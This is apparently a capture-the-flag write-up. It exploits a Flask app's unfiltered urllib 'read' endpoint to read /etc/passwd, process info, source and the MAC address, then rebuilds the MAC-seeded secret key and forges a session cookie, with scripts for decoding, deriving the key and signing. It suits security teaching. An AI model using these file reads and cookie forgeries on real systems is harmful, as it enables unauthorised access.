Clicking "Read somethings" redirects to Baidu, and a `url` parameter appears in the URL, so we guess there is an arbitrary file read.
Try /etc/passwd.
It reads successfully. Next read /proc/self/cmdline
to see the current process.
It is a Python backend, with the source at /api/app.py.
Read the source:
```python
# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())                           # seeded with the host MAC address
app.config['SECRET_KEY'] = str(random.random()*233)   # so the key is reproducible from it
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)   # blocks file:// only at the start
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
        return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )
```
This is clearly a flask-session challenge: the /flag route returns the flag, so the problem now is recovering the secret_key.

```python
app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True
```
Because random is given a fixed seed, the random number it produces is fixed. uuid.getnode()
returns the current MAC address, so we read /sys/class/net/eth0/address
and get the MAC address 02:42:ac:10:a9:06,
i.e. 0x0242ac10a906.
Use python2 to obtain the key (the app runs on Python 2, and Python 2's str() of a float keeps only 12 significant digits, so Python 3 would produce a different key string).
First decode our original session with a script:
```python
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    # Cookie layout is payload.timestamp.signature; strip the last two parts
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
    decompress = False
    # A leading '.' marks a zlib-compressed payload
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')
    # Flask's tagged JSON serializer restores non-JSON types such as bytes
    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    s = "eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.YJS5GQ.c-7rnz5YVqHA2e3GxPboKPlXDlU"
    print(decryption(s.encode()))
```
We get {'username': b'www-data'}.
Change it to {'username': b'fuck'}
and sign it with the flask-session tool using the recovered secret key.
Visiting the /flag page with the resulting session gives the flag.
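As an added illustration (my code, not part of the original write-up), the stdlib-only script below reproduces the weak key derivation for a given MAC, signs and verifies a cookie in the same payload.timestamp.signature layout decoded above, and shows the hardened key a server should use instead. The signing routine mirrors itsdangerous' default HMAC-SHA1 scheme with the 'cookie-session' salt as I recall it and uses plain JSON rather than Flask's tagged serializer, so byte-for-byte compatibility with a real Flask cookie is an assumption.

```python
import base64, hashlib, hmac, json, random, secrets, struct, time

def derive_key(mac_int):
    """Key the challenge app ends up with: random.seed(uuid.getnode()) then
    str(random.random()*233). Python 2's str(float) keeps 12 significant
    digits, so '%.12g' reproduces it on Python 3 (assumption: the target
    ran Python 2 and the product is not an exact integer)."""
    rng = random.Random(mac_int)
    return '%.12g' % (rng.random() * 233)

def strong_key():
    """Hardened replacement: 32 bytes from the OS CSPRNG, independent of the host."""
    return secrets.token_hex(32)

def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b'=')

def _unb64(s):
    return base64.urlsafe_b64decode(s + b'=' * (-len(s) % 4))

def _signing_key(secret_key, salt=b'cookie-session'):
    # itsdangerous' default 'hmac' key derivation (assumption): HMAC-SHA1(secret, salt)
    return hmac.new(secret_key.encode(), salt, hashlib.sha1).digest()

def sign_session(secret_key, data, ts=None):
    """Produce a cookie in the payload.timestamp.signature layout (plain JSON,
    not Flask's tagged JSON)."""
    ts = int(time.time()) if ts is None else ts
    payload = _b64(json.dumps(data, separators=(',', ':')).encode())
    stamp = _b64(struct.pack('>Q', ts).lstrip(b'\0'))  # big-endian int, no leading zeros
    body = payload + b'.' + stamp
    sig = hmac.new(_signing_key(secret_key), body, hashlib.sha1).digest()
    return (body + b'.' + _b64(sig)).decode()

def verify_session(secret_key, cookie):
    """Return the session dict only if the signature checks under secret_key,
    else None. Anyone who can derive the key passes this check."""
    body, _, sig = cookie.encode().rpartition(b'.')
    expected = hmac.new(_signing_key(secret_key), body, hashlib.sha1).digest()
    if not hmac.compare_digest(_b64(expected), sig):
        return None
    return json.loads(_unb64(body.rsplit(b'.', 1)[0]))

if __name__ == '__main__':
    mac = 0x0242ac10a906                     # MAC read from the container in the write-up
    weak = derive_key(mac)
    cookie = sign_session(weak, {'username': 'www-data'})
    print(weak, verify_session(weak, cookie), verify_session(strong_key(), cookie))
```

Seeding the same MAC twice yields the same key, which is the whole weakness; the same cookie fails verification under a key from secrets.token_hex.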